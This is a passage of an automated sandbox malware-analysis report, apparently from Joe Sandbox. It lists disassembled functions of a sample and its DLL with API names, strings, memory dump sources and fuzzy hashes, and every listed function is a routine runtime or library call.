                                  • Instruction Fuzzy Hash: 7251A17AB1A6428ADB14CF36D444A7E7392EF44B88F50D131DA4A937A4EF7DE841CB00
                                  Function 00007FFBC1BA59C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 3896166516-3733052814
                                  • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction ID: 6846908611befe4873db05ab6318fdeec8bc483c5742c95423e859928fcc1447
                                  • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                  • Instruction Fuzzy Hash: 3D51A2BAB09382CAEB648F31D69436A77A0EB44B85F546135DA4DA3791CF3CE551CF00
                                  Function 00007FFBC1BA51D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction ID: dd92b4207dc63abf28b2d838a8cb2cdab9450f2a4350fe2f204256ae6692a9f2
                                  • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                  • Instruction Fuzzy Hash: 7E618EB6A09BC5C5D7208F25E5403AEB7A0FB85794F045225EB9D27B59DF7CE290CB00
                                  Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressHandleLoadModuleProc
                                  • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                  • API String ID: 3055805555-3733552308
                                  • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                  • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                  • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                  Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Process$CurrentSizeWorking
                                  • String ID: Shrinking process size
                                  • API String ID: 2122760700-652428428
                                  • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                  • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                  • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                  Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$Leave
                                  • String ID:
                                  • API String ID: 2801635615-0
                                  • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                  • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                  • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                  Function 00007FFBC1BAE3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                  • String ID:
                                  • API String ID: 2718003287-0
                                  • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction ID: 4e3fd369b3f1011aba923d282a777336041f402bde5e1928b1d60c93afa1ce2a
                                  • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                  • Instruction Fuzzy Hash: 95D1F4B6F0AA8189E711CF79D4402ED37B1FB44798B049236EE5DA7B99DE38D406CB40
                                  Function 00007FFBC1BAED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00007FFBC1BAED07), ref: 00007FFBC1BAEE38
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00007FFBC1BAED07), ref: 00007FFBC1BAEEC3
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ConsoleErrorLastMode
                                  • String ID:
                                  • API String ID: 953036326-0
                                  • Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction ID: b63cdcca0b528a2c69f258db642e3249f3479be6d01f53e12a9b9599206772fb
                                  • Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
                                  • Instruction Fuzzy Hash: F791D4BAB1965185F7609F35D4802BE3BA4EB44B88F146139EE4E77A94CF38D446CB00
                                  Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                  Download Yara Rule
                                  APIs
                                  • EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
                                  • ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
                                  • SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
                                  • LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
                                  • Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
                                  • Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304
                                  Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalEventSection$EnterLeaveReset
                                  • String ID:
                                  • API String ID: 3553466030-0
                                  • Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
                                  • Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
                                  • Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344
                                  Function 00007FFBC1BA2218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                  • String ID:
                                  • API String ID: 2933794660-0
                                  • Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction ID: eddde16b781e5edbba344afe7e3026351619f86da83e98448b181cda0acbc829
                                  • Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
                                  • Instruction Fuzzy Hash: 4B114C6AB14F058AEB008F70E8542A933A4F71C758F441E31DA2D56BA4DF7CE154C740
                                  Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateEvent$CriticalInitializeSection
                                  • String ID:
                                  • API String ID: 926662266-0
                                  • Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
                                  • Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
                                  • Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700
                                  Function 00007FFBC1BA5C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: __except_validate_context_record
                                  • String ID: csm$csm
                                  • API String ID: 1467352782-3733052814
                                  • Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction ID: 6642192f41d3d2a69cf5e3b4ea4c838f345dec79f91c0b90912629af087912cb
                                  • Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
                                  • Instruction Fuzzy Hash: 3E7171BA60A681CAD7608F35D5447BE7BA0FB04B84F14A135EF8C67A89DB3CD651CB40
                                  Function 00007FFBC1BA6298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CreateFrameInfo__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2558813199-1018135373
                                  • Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction ID: 4a8ba56a974b7540ace2c153f86d9eab939451e902eb6460317b1a28f8ceaa5c
                                  • Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
                                  • Instruction Fuzzy Hash: 6C5151BB71AB4196D720AF25E04026E77A4FB89B90F146134DB8D27B65CF38E451CF40
                                  Function 00007FFBC1BAEA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ErrorFileLastWrite
                                  • String ID: U
                                  • API String ID: 442123175-4171548499
                                  • Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction ID: a5724ef8d392252292b8510e8a658f931ad4aca65e1946702f272b06aabfadf4
                                  • Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
                                  • Instruction Fuzzy Hash: A841D566B19A4181DB20DF35E4443AA77A1FB88794F805031EE4E97B94DF3CD441CB50
                                  Function 00007FFBC1BA9940 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileHandleType
                                  • String ID: 0eO
                                  • API String ID: 3000768030-633601889
                                  • Opcode ID: ad76da5c0a2ad7b24dd820ce22a2f6dea1c96ad3649e3b10ed6011db975978b7
                                  • Instruction ID: 9b86f3dabbcb359adba3da65d822a4af8fe82460757bcdc097cd5cdc599b863d
                                  • Opcode Fuzzy Hash: ad76da5c0a2ad7b24dd820ce22a2f6dea1c96ad3649e3b10ed6011db975978b7
                                  • Instruction Fuzzy Hash: 9931D565B19B4691EB208F25C59017A6750FB45BB0B78233ADBAE273E0CF38E491E740
                                  Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionRaise
                                  • String ID: csm
                                  • API String ID: 3997070919-1018135373
                                  • Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                  • Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
                                  • Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
                                  • Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41
                                  Function 00007FFBC1BB0910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00007FFBC1BA3A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBC1BA3A63
                                  • __GSHandlerCheckCommon.LIBCMT ref: 00007FFBC1BB0993
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CheckCommonHandler__except_validate_context_record
                                  • String ID: csm$f
                                  • API String ID: 1543384424-629598281
                                  • Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                  • Instruction ID: 921145a4a462198e5bb0c306c140ec62b4b52b4f948d3b2b1fc1260b5b48e525
                                  • Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
                                  • Instruction Fuzzy Hash: 4D11E17AB1878185E7109F26E1412AE6764EF44FC0F08E035EE8827B56CE38D861CB44
                                  Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641348974.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000009.00000002.2641326433.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641372093.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641390547.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000009.00000002.2641408994.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: TimerWaitable
                                  • String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
                                  • API String ID: 1823812067-484248852
                                  • Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                  • Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
                                  • Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
                                  • Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40
                                  Function 00007FFBC1BA3990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC1BA112F), ref: 00007FFBC1BA39E0
                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFBC1BA112F), ref: 00007FFBC1BA3A21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2641443333.00007FFBC1BA1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC1BA0000, based on PE: true
                                  • Associated: 00000009.00000002.2641427448.00007FFBC1BA0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641463475.00007FFBC1BB2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641481934.00007FFBC1BBD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000009.00000002.2641499316.00007FFBC1BBF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_7ffbc1ba0000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: ExceptionFileHeaderRaise
                                  • String ID: csm
                                  • API String ID: 2573137834-1018135373
                                  • Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                  • Instruction ID: 0d2007a8f3aa55af53659f5f81ce74d0affa49ee1f70da5a0b23ae3a4ffc63fe
                                  • Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
                                  • Instruction Fuzzy Hash: B6115B76609B8182EB208F25E50026A77E5FB88B84F589230DE8D17B68DF3CD551CB00
